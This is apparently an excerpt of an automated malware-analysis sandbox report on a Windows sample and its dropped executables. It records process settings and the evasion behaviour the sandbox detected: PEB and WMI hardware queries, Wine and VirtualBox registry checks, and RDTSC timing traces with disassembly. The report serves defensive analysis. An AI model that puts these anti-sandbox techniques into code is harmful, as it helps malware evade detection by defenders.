Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562D6 second address: D562DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562DE second address: D562E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562E3 second address: D562E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D562E9 second address: D562ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6484F second address: D64855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64855 second address: D6485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B36 second address: D64B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B4B second address: D64B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64B51 second address: D64B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FC734E5F776h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FC734E5F781h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC734E5F77Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CB5 second address: D64CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CBB second address: D64CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CC1 second address: D64CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CC8 second address: D64CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CE9 second address: D64CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64CED second address: D64CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E39 second address: D64E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E52 second address: D64E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D64E56 second address: D64E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67781 second address: D677B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D677B5 second address: D6782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6782D second address: D67842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67842 second address: D6787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D6796C second address: D67970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67970 second address: D67A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A2D second address: D67A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A31 second address: D67A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A37 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D67A69 second address: D67A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
